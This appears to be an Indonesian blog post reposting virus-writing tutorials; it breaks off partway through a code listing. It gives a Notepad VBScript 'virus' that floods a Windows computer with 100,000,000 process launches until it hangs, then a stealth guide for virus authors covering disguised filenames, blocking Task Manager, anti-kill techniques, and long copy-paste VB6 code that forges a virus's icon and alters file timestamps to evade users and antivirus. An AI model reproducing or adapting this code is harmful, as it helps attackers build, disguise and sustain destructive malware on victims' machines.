dari pada ngomongin orang lebih baik kita mengulas seputar dunia internet...skur2 ada manfaatnya...gk jg gk papa...orang gua jg blm, bisa kok.....Hehhehhehehehe
Sekarang gua mau mengulas tentang virus tp ingat jngn iseng luh...ya...Tp kl ktmu orang ngeselin sih Gpp ? yg dosa lu-lu pade ini..paling gw kecepretan Dikit


Membuat virus dengan notepad.

Membuat virus bukanlah merupakan hal yang sulit. Karena, kita dapat membuatnya dengan notepad yang terdapat di semua komputer yang memakai Windows.
Virus yang akan kita buat ini, adalah virus yang membuat komputer yang terinfeksi menjadi tidak bisa berjalan sama sekali.

Let`s Begin!

langkah-langkah:

1. buka notepad
2. copy+paste bahasa pemograman(yang bercetak tebal) di bawah ini:

option explicit

dim wshshell
set wshshell=wscript.createobject("wscript.shell")

dim x
for x = 1 to 100000000
wshshell.run "tourstart.exe"
next

untuk mendownload scipt, klik disini

3. Save notepad dengan nama virus.vbs ( pastikan ”save as type” diubah ke ”all files”)
4. Ingat!! jangan klik file tersebut. Karena komputer anda akan dipenuhi oleh 100000000
tourstart yang akan memenuhi layar anda, dan akan membuat komputer hang total
sebelum anda mendelete semuanya.
5. bila ingin mencoba virus ini. silahkan membuat ulang program, dengan perbedaan
ubah 100000000 ke 10, untuk percobaan. maka setelah anda mengklik program.
layar anda akan dipenuhi oleh hanya 10 tourstart saja....


Implementasi Teknik Stealth Pada Virus


Implementasi Teknik Stealth Pada Virus $> A little Words...
Penulis tidak bertanggung jawab atas kerugian yang ditimbulkan atas
penggunaan artikel ini (Use at Your Own Risk).
$> Start...
Mungkin sebagian (Atau seluruhnya) Vx3r (Pembuat Virus) pasti menemukan
suatu permasalahan dalam membuat Virusnya agar susah dihapus atau
meminimalisir pendeteksian oleh User ataupun Anti Virus.
Bagaimana sih cara-cara Vx3r itu menyembunyikan Virusnya di komputer
korban? Ada beberapa cara yang klasik dan sangat sering dilakukan, Seperti:
1. Merubah nama File Virus menjadi (mirip) File system Windows, contoh
RunDll32.exe, Winsys32.exe,dll
2. Menempatkan File Virus di Folder Hidden atau di Folder System Windows.
3. Menghalangi Akses ke Task Manager maupun Tool-tool yang dapat
menampilkan proses yang sedang berlangsung. Hal ini lumrah karena virus
ingin eksistensinya dipertahankan.
4. Menggunakan nama file yang random atau acak.
5. Menggunakan Ikon yang umum seperti MS-Word, Folder, Setup program, dll.
6. Memblok fasilitas Search.
7. Dan lainnya.
Lalu apa saja kelemahannya? Untuk penggunaan Ikon yang umum hal ini sangat
fatal, karena User dapat membedakan antara ikon Default File *.Exe dengan ikon
yang dipakai oleh Virus. Sebagai contoh apabila si Virus memakai Ikon MSWord
maka akan terjadi suatu kejanggalan, "Ikonnya Word kok ekstensinya
Exe?".
58
Contoh lagi kasus penggunaan nama file random atau acak. Pada hal ini
diperlukan suatu penyimpanan dari nama file acak itu, karena pada Trigger
Virus jalan dia akan mencari file yang dimaksud. Pemyimpanan nya pun berupa
file ataupun key di registry. Kedua teknik penyimpanan tersebut sama baiknya
apabila dilengkapi oleh teknik Enkripsi. Pada suatu Virus yang pernah saya
temukan dan analisa, Kangen.E telah menggunakan nama acak dan
penyimpanan di suatu file *.sys. Dan file tersebut dibiarkan apa adanya tanpa
perlindungan apapun terhadap isinya. Hal ini memudahkan dalam melacak
nama trigger virus tsb.
Sebenarnya langkah apa yang harus diambil agar virus kita tak mudah terlacak
oleh User? Menurut pandangan saya ada beberapa poin yang sangat penting:
1. Lakukan teknik penggantian Ikon secara langsung (Ekstrak dan ganti), bukan
mengandalkan ikon default.
2. Penggantian Filetime maupun FileDate dan ukuran pada file Virus agar tidak
mudah ditemukan dengan Search.
3. Gunakan API-Hook dalam melacak tool Proses Viewer, jangan mengandalkan
windows Caption karena sudah banyak tool yang tidak memakai window
caption lagi.
4. Jika memungkinkan jangan me-launch instan virus dengan cara "shell", karena
hal ini dapat berakibat Proses Virus menjadi Parent and Child. Bila sang parent
mati maka si child pun akan ikut mati.
5. Selalu gunakan instan virus lain untuk saling melacak keberadaan virus (Anti-
Kill process) sehingga virus memungkinkan untuk tetap eksis.
$> How to...?
Saya menggunakan Bahasa Pemograman Visual Basic 6.0 dalam mencoba teknik
stealth (yang menurut saya) agak baik Serta beberapa referensi Source Code
maupun artikel dari Internet.
Teknik ini juga saya coba pada Virus Diary.Exe (V 1.3-1.5) dengan beberapa
perubahan.
1. Penggantian ikon
Jika anda pernah menemukan suatu software pengekstrak atau pengganti ikon
(bahkan keduanya) suatu file, maka kurang lebih hal ini bisa juga
diimplementasikan di Virus :D. Contoh algoritmanya :
START EXECUTION
|
Copy myself.exe to destination path
|
59
Search file yang akan diekstrak ikonnya
|
Ekstrak ikonnya, save to destination path
|
Change myself.exe dengan file ikon (*.Ico)
yang sudah di ekstrak
|
Hapus File ikon apabila sudah tidak digunakan
|
END EXECUTION
Saya menggunakan file Shell32.Dll sebagai file yang akan diekstrak Ikonnya,
dalam hal ini saya akan memilih ikon Default file *.exe (yang berwarna kotak
putih-biru :P). Kira-kira begini source codenya :
(Diperlukan Objek PictureBox dalam Form)
-----------------------------Cut Here & Start Copy-Paste from Here--------------------------
Sub cariikon(pathcari As String, pathekstrak As String, jenisikon As String, pic2 As
PictureBox)
Dim poin As Long
poin = 1
Dim i As Long
Dim buf(1000) As Double
Dim jum As Integer
jum = 0
Dim jikon As Long
jikon = 0
Dim init As String
init = Chr$(0) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(1) & Chr$(0) & Chr$(32) & Chr$(32) &
Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(0) & Chr$(168) & Chr$(8) & Chr$(0)
& Chr$(0) & Chr$(22) & Chr$(0) & Chr$(0) & Chr$(0)
Dim strbaca As String
strbaca = Space(2238)
Dim fildat As String
Dim new_dic As String
Dim rs As String
rs = Chr$(0) & Chr$(0) & Chr$(0) & " " & Chr$(0) & Chr$(0) & Chr$(0) & "@"
Dim buff As Double
buff = 1024 ^ 2
Open pathcari For Binary As #1
If LOF(1) > buff Then
fildat = Space(buff)
Else
fildat = Space(LOF(1))
End If
balik:
If poin > LOF(1) Then
GoTo tulis
End If
Get #1, poin, fildat
i = 1
carilagi:
DoEvents
60
i = InStr(i + 1, fildat, "(" & rs)
If i > 0 Then
'lst.Add "#" & lst.Count & "#", i + poin - 1
buf(jum) = i + poin - 1
jum = jum + 1
End If
If i + Len(rs) > buff Or i = 0 Then
poin = poin + buff - Len("(" & rs) - 1
GoTo balik
Else
GoTo carilagi
End If
tulis:
Close
Open pathcari For Binary As #1
For poin = 0 To jum - 1
DoEvents
If Right(pathekstrak, 1) <> "\" Then
pathekstrak = pathekstrak & "\"
End If
If poin <> jenisikon Then GoTo lsg
Open pathekstrak & "Ikon.ico" For Output As #2: Close #2
Open pathekstrak & "Ikon.ico" For Binary As #2
'i = lst.Item("#" & poin & "#")
i = buf(poin)
Get #1, i, strbaca
Put #2, 1, init & strbaca & Chr$(255)
Close #2
If ikon(pathekstrak & "Ikon.ico", pic2) = 0 Then
Kill pathekstrak & "Ikon.ico"
End If
DoEvents
lsg: Next poin
Close #1
Close
End Sub
sub ikon(path As String, pic As PictureBox)
On Error GoTo ero
pic.Picture = LoadPicture(path)
ikon = 1
Exit Function
ero:
ikon = 0
Exit Function
End Function
-----------------------------Cut Here & Start Copy-Paste from Here--------------------------
Prosedur cariikon akan mencari file yang akan diekstrak ikonnya berdasarkan
index ikon tersebut. Ikon yang akan dihasilkan masih berukuran 16X16, tetapi
hal itu sudah cukup untuk mengelabui User. Perlu diingat bahwa index ikon file
*.Exe dalam shell32.Dll untuk tiap versi Windows adalah berbeda. Terutama
untuk Windows 9x dan Windows 2k/2003/XP/NT.
Lalu bagaimana kita menukar atau change ikon virus kita dengan file ikon yang
sudah diekstrak tsb?
(Referensi Source Code dari Internet, Author :Naveed, neenojee@hotmail.com)
61
1st. Module:
-----------------------------Cut Here & Start Copy-Paste from Here--------------------------
Option Explicit
Type DIB_HEADER
Size As Long
Width As Long
Height As Long
Planes As Integer
Bitcount As Integer
Reserved As Long
ImageSize As Long
End Type
Type ICON_DIR_ENTRY
bWidth As Byte
bHeight As Byte
bColorCount As Byte
bReserved As Byte
wPlanes As Integer
wBitCount As Integer
dwBytesInRes As Long
dwImageOffset As Long
End Type
Type ICON_DIR
Reserved As Integer
Type As Integer
Count As Integer
End Type
Type DIB_BITS
Bits() As Byte
End Type
Public Enum Errors
FILE_CREATE_FAILED = 1000
FILE_READ_FAILED
INVALID_PE_SIGNATURE
INVALID_ICO
NO_RESOURCE_TREE
NO_ICON_BRANCH
CANT_HACK_HEADERS
End Enum
Public Function ReplaceIcons(Source As String, Dest As String) As Long
Dim IcoDir As ICON_DIR
Dim IcoDirEntry As ICON_DIR_ENTRY
Dim tBits As DIB_BITS
Dim Icons() As IconDescriptor
Dim lngRet As Long
Dim BytesRead As Long
Dim hSource As Long
Dim hDest As Long
Dim ResTree As Long
hSource = CreateFile(Source, ByVal &H80000000, 0, ByVal 0&, 3, 0, ByVal 0)
If hSource >= 0 Then
If Valid_ICO(hSource) Then
SetFilePointer hSource, 0, 0, 0
ReadFile hSource, IcoDir, 6, BytesRead, ByVal 0&
ReadFile hSource, IcoDirEntry, 16, BytesRead, ByVal 0&
SetFilePointer hSource, IcoDirEntry.dwImageOffset, 0, 0
ReDim tBits.Bits(IcoDirEntry.dwBytesInRes) As Byte
ReadFile hSource, tBits.Bits(0), IcoDirEntry.dwBytesInRes, BytesRead, ByVal 0&
CloseHandle hSource
hDest = CreateFile(Dest, ByVal (&H80000000 Or &H40000000), 0, ByVal 0&, 3, 0,
ByVal 0)
If hDest >= 0 Then
If Valid_PE(hDest) Then
ResTree = GetResTreeOffset(hDest)
62
If ResTree > 308 Then ' Sanity check
lngRet = GetIconOffsets(hDest, ResTree, Icons)
SetFilePointer hDest, Icons(1).Offset, 0, 0
WriteFile hDest, tBits.Bits(0), UBound(tBits.Bits), BytesRead, ByVal 0&
Else
CloseHandle hDest
End If
Else
CloseHandle hDest
End If
CloseHandle hDest
Else
End If
Else
CloseHandle hSource
End If
Else
End If
ReplaceIcons = 0
Exit Function
End Function
Public Function Valid_ICO(hfile As Long) As Boolean
Dim tDir As ICON_DIR
Dim BytesRead As Long
If (hfile > 0) Then
ReadFile hfile, tDir, Len(tDir), BytesRead, ByVal 0&
If (tDir.Reserved = 0) And (tDir.Type = 1) And (tDir.Count > 0) Then
Valid_ICO = True
Else
Valid_ICO = False
End If
Else
Valid_ICO = False
End If
End Function
-----------------------------Cut Here & Start Copy-Paste from Here--------------------------
2nd. Module
-----------------------------Cut Here & Start Copy-Paste from Here--------------------------
Option Explicit
Public Type IMAGE_DOS_HEADER
Magic As Integer
cblp As Integer
cp As Integer
crlc As Integer
cparhdr As Integer
minalloc As Integer
maxalloc As Integer
ss As Integer
sp As Integer
csum As Integer
ip As Integer
cs As Integer
lfarlc As Integer
ovno As Integer
res(3) As Integer
oemid As Integer
oeminfo As Integer
res2(9) As Integer
lfanew As Long
End Type
Public Type IMAGE_FILE_HEADER
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
63
SizeOfOtionalHeader As Integer
Characteristics As Integer
End Type
Public Type IMAGE_DATA_DIRECTORY
DataRVA As Long
DataSize As Long
End Type
Public Type IMAGE_OPTIONAL_HEADER
Magic As Integer
MajorLinkVer As Byte
MinorLinkVer As Byte
CodeSize As Long
InitDataSize As Long
unInitDataSize As Long
EntryPoint As Long
CodeBase As Long
DataBase As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOSVer As Integer
MinorOSVer As Integer
MajorImageVer As Integer
MinorImageVer As Integer
MajorSSVer As Integer
MinorSSVer As Integer
Win32Ver As Long
ImageSize As Long
HeaderSize As Long
Checksum As Long
Subsystem As Integer
DLLChars As Integer
StackRes As Long
StackCommit As Long
HeapReserve As Long
HeapCommit As Long
LoaderFlags As Long
RVAsAndSizes As Long
DataEntries(15) As IMAGE_DATA_DIRECTORY
End Type
Public Type IMAGE_SECTION_HEADER
SectionName(7) As Byte
Address As Long
VirtualAddress As Long
SizeOfData As Long
PData As Long
PReloc As Long
PLineNums As Long
RelocCount As Integer
LineCount As Integer
Characteristics As Long
End Type
Type IMAGE_RESOURCE_DIR
Characteristics As Long
TimeStamp As Long
MajorVersion As Integer
MinorVersion As Integer
NamedEntries As Integer
IDEntries As Integer
End Type
Type RESOURCE_DIR_ENTRY
Name As Long
Offset As Long
End Type
Type RESOURCE_DATA_ENTRY
64
Offset As Long
Size As Long
CodePage As Long
Reserved As Long
End Type
Public Type IconDescriptor
ID As Long
Offset As Long
Size As Long
End Type
Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any,
Source As Any, ByVal Length As Long)
Public Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName
As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, lpSecurityAttributes
As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal
hTemplateFile As Long) As Long
Public Declare Function ReadFile Lib "kernel32" (ByVal hfile As Long, lpBuffer As Any,
ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As
Long
Public Declare Function WriteFile Lib "kernel32" (ByVal hfile As Long, lpBuffer As Any,
ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, lpOverlapped As Any)
As Long
Public Declare Function SetFilePointer Lib "kernel32" (ByVal hfile As Long, ByVal
lDistanceToMove As Long, lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As
Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private SectionAlignment As Long
Private FileAlignment As Long
Private ResSectionRVA As Long
Private ResSectionOffset As Long
Public Function Valid_PE(hfile As Long) As Boolean
Dim Buffer(12) As Byte
Dim lngBytesRead As Long
Dim tDosHeader As IMAGE_DOS_HEADER
If (hfile > 0) Then
ReadFile hfile, tDosHeader, ByVal Len(tDosHeader), lngBytesRead, ByVal 0&
CopyMemory Buffer(0), tDosHeader.Magic, 2
If (Chr(Buffer(0)) & Chr(Buffer(1)) = "MZ") Then
SetFilePointer hfile, tDosHeader.lfanew, 0, 0
ReadFile hfile, Buffer(0), 4, lngBytesRead, ByVal 0&
If (Chr(Buffer(0)) = "P") And (Chr(Buffer(1)) = "E") And (Buffer(2) = 0) And
(Buffer(3) = 0) Then
Valid_PE = True
Exit Function
End If
End If
End If
Valid_PE = False
End Function
Public Function GetResTreeOffset(hfile As Long) As Long
On Error GoTo ErrHandler:
Dim tDos As IMAGE_DOS_HEADER
Dim tFile As IMAGE_FILE_HEADER
Dim tOptional As IMAGE_OPTIONAL_HEADER
Dim tSections() As IMAGE_SECTION_HEADER
Dim BytesRead As Long
Dim intC As Integer
Dim TreeFound As Boolean
TreeFound = False
If (hfile > 0) Then
SetFilePointer hfile, 0, 0, 0
' Get the offset of the Image File Header
65
ReadFile hfile, tDos, Len(tDos), BytesRead, ByVal 0&
SetFilePointer hfile, ByVal tDos.lfanew + 4, 0, 0
' Get the Image File Header and the Image Optional Header
ReadFile hfile, tFile, Len(tFile), BytesRead, ByVal 0&
ReadFile hfile, tOptional, Len(tOptional), BytesRead, ByVal 0&
' Get section headers
ReDim tSections(tFile.NumberOfSections - 1) As IMAGE_SECTION_HEADER
ReadFile hfile, tSections(0), Len(tSections(0)) * tFile.NumberOfSections,
BytesRead, ByVal 0&
' Make sure there is a resource tree in this file
If (tOptional.DataEntries(2).DataSize) Then
' Save section alignment and file alignment of image
SectionAlignment = tOptional.SectionAlignment
FileAlignment = tOptional.FileAlignment
' Determine which section contains the resource tree
For intC = 0 To UBound(tSections)
If (tSections(intC).VirtualAddress <= tOptional.DataEntries(2).DataRVA) _
And ((tSections(intC).VirtualAddress + tSections(intC).SizeOfData) >
tOptional.DataEntries(2).DataRVA) Then
TreeFound = True
' Save RVA and offset of resource section for future calculations
ResSectionRVA = tSections(intC).VirtualAddress
ResSectionOffset = tSections(intC).PData
' Calculate the physical file offset of the resouce tree
GetResTreeOffset = tSections(intC).PData +
(tOptional.DataEntries(2).DataRVA - tSections(intC).VirtualAddress)
Exit For
End If
Next intC
If Not TreeFound Then
GetResTreeOffset = -1
End If
Else
GetResTreeOffset = -1
End If
Else
GetResTreeOffset = -1
End If
Exit Function
ErrHandler:
End Function
Public Function GetIconOffsets(hfile As Long, TreeOffset As Long, Icons() As
IconDescriptor) As Long
On Error GoTo ErrHandler:
Dim Root As IMAGE_RESOURCE_DIR ' Root node of resource tree
Dim L1Entries() As RESOURCE_DIR_ENTRY ' 1st level of directory entries
Dim L2Root() As IMAGE_RESOURCE_DIR ' Level 2 resource directories
Dim L2Entries() As RESOURCE_DIR_ENTRY ' 2nd level of directory entries
Dim L3Root() As IMAGE_RESOURCE_DIR ' Level 3 resource directories
Dim L3Entries() As RESOURCE_DIR_ENTRY ' 3rd level of directory entries
Dim DataEntries() As RESOURCE_DATA_ENTRY ' Resource data entries
Dim DIB As DIB_HEADER ' Descriptor for icon images
Dim iLvl1 As Integer ' Loop Counter (first level)
Dim iLvl2 As Integer ' Loop Counter (second level)
Dim iLvl3 As Integer ' Loop Counter (third level)
Dim Cursor As Long ' Temp val for setting file pointer
Dim BytesRead As Long ' For ReadFile()
Dim Count As Integer ' Number of icons found
If (hfile > 0) Then
Count = 0
SetFilePointer hfile, ByVal TreeOffset, 0, 0
' Get the root node and begin navigating the resource tree
ReadFile hfile, Root, Len(Root), BytesRead, ByVal 0
ReDim L2Root(Root.NamedEntries + Root.IDEntries) As IMAGE_RESOURCE_DIR
ReDim L1Entries(Root.NamedEntries + Root.IDEntries) As RESOURCE_DIR_ENTRY
' Get first level child nodes
For iLvl1 = 1 To (Root.NamedEntries + Root.IDEntries)
66
SetFilePointer hfile, TreeOffset + 8 + (iLvl1 * 8), 0, 0
ReadFile hfile, L1Entries(iLvl1), 8, BytesRead, ByVal 0&
If L1Entries(iLvl1).Name = 3 Then
' Jump to level 2 and get directory
' Strip high-order byte from offset
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + TreeOffset
SetFilePointer hfile, ByVal Cursor, 0, 0
ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0&
ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As
IMAGE_RESOURCE_DIR
ReDim L2Entries(L2Root(iLvl1).IDEntries + L2Root(iLvl1).NamedEntries) As
RESOURCE_DIR_ENTRY
For iLvl2 = 1 To (L2Root(iLvl1).IDEntries + L2Root(iLvl1).NamedEntries)
' Read second level child nodes
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + TreeOffset
SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0
ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0&
' Jump to level 3 and get directory
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + TreeOffset
SetFilePointer hfile, ByVal Cursor, 0, 0
ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0&
ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As
RESOURCE_DIR_ENTRY
ReDim DataEntries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As
RESOURCE_DATA_ENTRY
For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
' Read third level child nodes
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + TreeOffset
SetFilePointer hfile, (Cursor + 8 + (iLvl3 * 8)), 0, 0
ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
' Jump to IMAGE_DATA_ENTRY and get RVA of IconDir structure
SetFilePointer hfile, TreeOffset + (L3Entries(iLvl3).Offset), 0, 0
ReadFile hfile, DataEntries(iLvl3), 16, BytesRead, ByVal 0&
' Convert RVA of IconDir structure to file offset and store
Count = Count + 1
ReDim Preserve Icons(Count) As IconDescriptor
Icons(Count).Offset = RVA_to_Offset(DataEntries(iLvl3).Offset)
' Store ID of icon resource
Icons(Count).ID = L2Entries(iLvl2).Name
' Store Size of icon resource
SetFilePointer hfile, Icons(Count).Offset, 0, 0
ReadFile hfile, DIB, ByVal Len(DIB), BytesRead, ByVal 0&
Icons(Count).Size = DIB.ImageSize + 40
Next iLvl3
Next iLvl2
End If
Next iLvl1
Else
Count = 0
End If
' Return the number of icons found
GetIconOffsets = Count
Exit Function
ErrHandler:
End Function
Public Function HackDirectories(hfile As Long, ResTree As Long, DIBOffset As Long, _
DIBAttrib As ICON_DIR_ENTRY) As Boolean
On Error GoTo ErrHandler:
Dim Cursor As Long ' File pointer position
Dim Root As IMAGE_RESOURCE_DIR ' Root node of res tree
Dim L1Entries() As RESOURCE_DIR_ENTRY ' First-level child nodes
Dim L2Root() As IMAGE_RESOURCE_DIR ' Second-level root nodes
Dim L2Entries() As RESOURCE_DIR_ENTRY ' Second-level child nodes
67
Dim L3Root() As IMAGE_RESOURCE_DIR ' Third-level root nodes
Dim L3Entries() As RESOURCE_DIR_ENTRY ' Third-level child nodes
Dim DataEntries() As RESOURCE_DATA_ENTRY ' IMAGE_RESOURCE_DATA_ENTRY structs
Dim IcoDir As ICON_DIR ' IconDirectory in EXE
Dim iLvl1 As Integer ' Loop Counter (first level)
Dim iLvl2 As Integer ' Loop Counter (second level)
Dim iLvl3 As Integer ' Loop Counter (third level)
Dim intC As Integer ' Loop Counter (general)
Dim BytesRead As Long ' Returned by Read/WriteFile API's
If (hfile >= 0) Then
' Convert DIBOffset to an RVA (needed for RESOURCE_DATA_ENTRY structures)
DIBOffset = Offset_to_RVA(DIBOffset)
SetFilePointer hfile, ByVal ResTree, 0, 0
ReadFile hfile, Root, Len(Root), BytesRead, ByVal 0&
ReDim L1Entries(Root.NamedEntries + Root.IDEntries) As RESOURCE_DIR_ENTRY
ReDim L2Root(Root.NamedEntries + Root.IDEntries) As IMAGE_RESOURCE_DIR
' Loop through first-level child nodes and find RT_GROUP_ICON branch
For iLvl1 = 1 To (Root.NamedEntries + Root.IDEntries)
SetFilePointer hfile, ResTree + 8 + (iLvl1 * 8), 0, 0
ReadFile hfile, L1Entries(iLvl1), 8, BytesRead, ByVal 0&
If L1Entries(iLvl1).Name = &HE Then
' RT_GROUP_ICON branch found
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor, 0, 0
' Read second-level directory
ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0&
ReDim L2Entries(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As
RESOURCE_DIR_ENTRY
ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As
IMAGE_RESOURCE_DIR
For iLvl2 = 1 To (L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries)
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0
ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0&
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor, 0, 0
' Read thrid-level directory
ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0&
ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As
RESOURCE_DIR_ENTRY
For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
' Read third-level child nodes
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + ResTree + 8 + (iLvl3 * 8)
SetFilePointer hfile, Cursor, 0, 0
ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
' Jump to RESOURCE_DATA_ENTRY
CopyMemory Cursor, L3Entries(iLvl3).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor, 0, 0
ReDim Preserve DataEntries(iLvl3) As RESOURCE_DATA_ENTRY
ReadFile hfile, DataEntries(iLvl3), 16, BytesRead, ByVal 0&
' Jump to and read ICON_DIR structure
Cursor = RVA_to_Offset(DataEntries(iLvl3).Offset)
SetFilePointer hfile, Cursor, 0, 0
ReadFile hfile, IcoDir, 6, BytesRead, ByVal 0&
For intC = 1 To IcoDir.Count
WriteFile hfile, DIBAttrib, Len(DIBAttrib) - 4, BytesRead, ByVal 0&
SetFilePointer hfile, 2, 0, 1
Next intC
Next iLvl3
Next iLvl2
ElseIf L1Entries(iLvl1).Name = 3 Then
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, ByVal Cursor, 0, 0
' Read second-level directory
68
ReadFile hfile, L2Root(iLvl1), 16, BytesRead, ByVal 0&
ReDim L2Entries(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As
RESOURCE_DIR_ENTRY
ReDim L3Root(L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries) As
IMAGE_RESOURCE_DIR
For iLvl2 = 1 To (L2Root(iLvl1).NamedEntries + L2Root(iLvl1).IDEntries)
CopyMemory Cursor, L1Entries(iLvl1).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor + 8 + (iLvl2 * 8), 0, 0
ReadFile hfile, L2Entries(iLvl2), 8, BytesRead, ByVal 0&
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + ResTree
SetFilePointer hfile, Cursor, 0, 0
' Read thrid-level directory
ReadFile hfile, L3Root(iLvl2), 16, BytesRead, ByVal 0&
ReDim L3Entries(L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries) As
RESOURCE_DIR_ENTRY
For iLvl3 = 1 To (L3Root(iLvl2).NamedEntries + L3Root(iLvl2).IDEntries)
' Read third-level child nodes
CopyMemory Cursor, L2Entries(iLvl2).Offset, 3
Cursor = Cursor + ResTree + 8 + (iLvl3 * 8)
SetFilePointer hfile, Cursor, 0, 0
ReadFile hfile, L3Entries(iLvl3), 8, BytesRead, ByVal 0&
' Jump to and hack the RESOURCE_DATA_ENTRY
Cursor = L3Entries(iLvl3).Offset + ResTree
SetFilePointer hfile, Cursor, 0, 0
WriteFile hfile, DIBOffset, 4, BytesRead, ByVal 0&
WriteFile hfile, CLng(DIBAttrib.dwBytesInRes + 40), 4, BytesRead, ByVal
0&
Next iLvl3
Next iLvl2
End If
Next iLvl1
Else
HackDirectories = False
Exit Function
End If
HackDirectories = True
Exit Function
ErrHandler:
End Function
Private Function RVA_to_Offset(RVA As Long) As Long
On Error GoTo ErrHandler:
Dim TempOffset As Long ' Difference of RVA and start of section
TempOffset = RVA - ResSectionRVA
If (TempOffset >= 0) Then
' Calculate the file offset of the RVA
RVA_to_Offset = ResSectionOffset + TempOffset
Else
RVA_to_Offset = -1
End If
Exit Function
ErrHandler:
End Function
Private Function Offset_to_RVA(Offset As Long) As Long
On Error GoTo ErrHandler:
Dim TempOffset As Long ' Difference of Offset and start of section
' Get distance between offset and start of resource section
TempOffset = Offset - ResSectionOffset
If TempOffset >= 0 Then
' Calculate RVA of the file offset
Offset_to_RVA = ResSectionRVA + TempOffset
Else
69
Offset_to_RVA = -1
End If
Exit Function
ErrHandler:
End Function
-----------------------------Cut Here & Start Copy-Paste from Here--------------------------
Prosedur ReplaceIcon (1st. Module) akan mengganti Ikon Virus kita dengan file
*.Ico tsb (Source = Path file ikon, Dest = Path file yang akan diganti ikonnya),
Ada beberapa kelemahan dalam penggantian Ikon ini. Pertama, bila Virus
dikompress atau di-Pack dengan settingan untuk menghilangkan atau hanya
megkompress resource dari File maka penggantian Ikon ini tidak bisa berjalan
mulus. Kedua, untuk beberapa file yang akan dikestrak kadang-kadang ikon
tidak berukuran 16X16, bahkan tidak bisa diekstrak sama sekali.
2. Penggantian Date dan Time File Virus
Field apakah yang paling sering digunakan dalam fasilitas Search suatu file di
Windows? Waktu akses/modif/buat dari file.
Ambil contoh virus A.exe dibuat pada tanggal 1 Feb 2006, mulai menginfeksi
komputer anda tanggal 2 Feb 2006. Maka yang harus anda lakukan dalam
mencari file tsb dengan mengisikan field tanggal search dengan range 1 Feb 2006
sampai 2 Feb 2006.
Apa yang harus dilakukan? Kita harus rubah tanggal akes/modif/buat dari file
Virus kita agar tidak (atau setidaknya mempersulit) User mencarinya. Berikut
Source Code yang kira-kira dapat menggambarkan teknik tersebut :
(Referensi Source Code dari Internet, Author : marskarthik@angelfire.com)
-----------------------------Cut Here & Start Copy-Paste from Here--------------------------
Option Explicit
Public Declare Function SetFileTime Lib "kernel32" (ByVal hfile As Long, lpCreationTime
As FILETIME, lpLastAccessTime As FILETIME, lpLastWriteTime As FILETIME) As Long
Public Declare Function GetFileTime Lib "kernel32" (ByVal hfile As Long, lpCreationTime
As FILETIME, lpLastAccessTime As FILETIME, lpLastWriteTime As FILETIME) As Long
Public Declare Function FileTimeToLocalFileTime Lib "kernel32" (lpFileTime As FILETIME,
lpLocalFileTime As FILETIME) As Long
Public Declare Function FileTimeToSystemTime Lib "kernel32" (lpFileTime As FILETIME,
lpSystemTime As SYSTEMTIME) As Long
Public Declare Function SystemTimeToFileTime Lib "kernel32" (lpSystemTime As SYSTEMTIME,
lpFileTime As FILETIME) As Long
Public Declare Function LocalFileTimeToFileTime Lib "kernel32" (lpLocalFileTime As
FILETIME, lpFileTime As FILETIME) As Long
